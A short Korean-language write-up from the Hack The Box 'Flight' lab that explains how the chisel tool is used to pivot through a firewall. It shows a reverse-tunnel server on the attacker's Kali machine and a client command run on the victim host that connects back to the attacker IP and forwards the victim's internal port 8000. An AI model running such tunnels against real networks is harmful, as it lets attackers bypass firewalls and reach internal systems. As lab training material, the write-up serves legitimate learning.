chisel

HTB Labs : Flight

1. 개요

해당 툴은 방화벽을 뚫고 내부 네트워크로 통로를 만들어주는 도구이다. 이를 피봇팅 또는 터널링이라고 용어를 부른다. 통상 웹 트래픽으로 위장하여 80포트와 443포트에 대해서 지원하는데, 방화벽이 이 두 포트 외에 전부 막혀있을 때에 ligoro-ng 대신에 사용해야 한다.

2. 사용법

2.1. 서버 측 사용법

서버라고 하면 나의 kali 를 의미한다. Victim PC 에서 내 kali 방향으로 연결을 기다리는 리버스 쉘 형태로 사용할 때에는 --reverse 라고 옵션을 준다. 아래의 옵션은 내가 server 가 되고 나의 kali 에서 8000 번으로 포트를 여는 것을 의미한다.

┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# ./chisel_1.11.3_linux_arm64 server -p 8000 --reverse
2025/12/22 13:28:21 server: Reverse tunnelling enabled
2025/12/22 13:28:21 server: Fingerprint b0Twrsw/gLWr2mNX4vpCIUcp70wZiGmPVzwn+WprnYc=
2025/12/22 13:28:21 server: Listening on http://0.0.0.0:8000

2.2. 클라이언트 측 사용법

통상 Victim PC 를 의미한다. client 파일을 Victim PC 로 이송한 뒤 아래와 같은 명령어를 작성한다.

아래의 명령어를 설명하자면, 내 kali IP인 10.10.14.143 에 대해서는 위에서 설정해놓은 8000 번 포트로 연결을 시도하는 의미이고, R:8001:127.0.0.1:8000 에서 R 은 Reverse Shell 을 의미, 8001 은 Kali PC에서 8001 번을 열겠다는 의미이며, 127.0.0.1:8000 은 Victim PC 내의 서비스 중 8000 번 포트를 피봇팅 하겠다는 의미이다.

C:\ProgramData>.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
2025/12/22 08:35:31 client: Connecting to ws://10.10.14.143:8000
2025/12/22 08:35:33 client: Connected (Latency 188.9217ms)

2.3. 결과

HTB flight Labs 에서는 아래와 같이 피봇팅을 한 결과를 볼 수 있다. Kali 에서 127.0.0.18001 번으로 접근 시 아래와 같이 내부망을 확인할 수 있다.

Updated on